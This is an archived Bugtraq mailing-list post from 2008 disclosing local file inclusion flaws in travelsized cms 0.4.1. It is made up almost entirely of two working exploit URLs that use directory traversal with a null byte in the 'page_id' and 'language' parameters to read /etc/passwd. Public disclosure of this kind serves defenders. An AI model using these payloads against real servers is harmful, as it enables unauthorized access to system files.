[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

travelsized cms 0.4.1 multiple local file inclusion vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: travelsized cms 0.4.1 multiple local file inclusion vulnerabilities
From: "muuratsalo experimental hack lab" <muuratsalo@xxxxxxxxx>
Date: Wed, 12 Mar 2008 00:04:45 +0100

travelsized cms 0.4.1 multiple local file inclusion vulnerabilities

download   http://sourceforge.net/projects/uberghey/

author     muuratsalo
contact    muuratsalo[at]gmail.com

exploits
http://localhost/travelsized-0.4.1/index.php?page_id=../../../../../../../../../../etc/passwd%00
http://localhost/travelsized-0.4.1/index.php?language=../../../../../../../../../../etc/passwd%00

Prev by Date: [SECURITY] [DSA 1515-1] New libnet-dns-perl packages fix several vulnerabilities
Next by Date: iDefense Security Advisory 03.11.08: Microsoft Excel 2003 Malformed Formula Memory Corruption Vulnerability
Previous by thread: [SECURITY] [DSA 1515-1] New libnet-dns-perl packages fix several vulnerabilities
Next by thread: iDefense Security Advisory 03.11.08: Microsoft Excel 2003 Malformed Formula Memory Corruption Vulnerability
Index(es):
- Date
- Thread